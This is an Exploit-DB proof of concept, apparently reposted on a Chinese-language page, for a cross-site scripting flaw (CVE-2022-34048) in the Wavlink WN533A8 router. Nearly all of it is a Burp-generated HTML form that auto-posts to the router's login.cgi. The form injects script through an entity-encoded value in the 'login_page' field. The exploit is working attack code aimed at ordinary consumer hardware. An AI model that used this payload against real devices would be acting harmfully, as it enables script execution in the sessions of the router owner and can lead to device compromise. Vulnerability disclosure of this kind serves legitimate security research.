Wavlink WN533A8 – Cross-Site Scripting (XSS)

  • 作者: Ahmed Alroky
    日期: 2022-08-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50989/
  • # Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
    # Exploit Author: Ahmed Alroky
    # Author Company : AIactive
    # Version: M33A8.V5030.190716
    # Vendor home page : wavlink.com
    # Authentication Required: No
    # CVE : CVE-2022-34048
    # Tested on: Windows
    
    # Poc code
    <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
    <input type="hidden" name="newUI" value="1" />
    <input type="hidden" name="page" value="login" />
    <input type="hidden" name="username" value="admin" />
    <input type="hidden" name="langChange" value="0" />
     <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
    <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
    <input type="hidden" name="homepage" value="main&#46;shtml" />
    <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
    <input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
    <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
    <input type="hidden" name="key" value="M94947765" />
    <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
    <input type="hidden" name="lang&#95;select" value="en" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>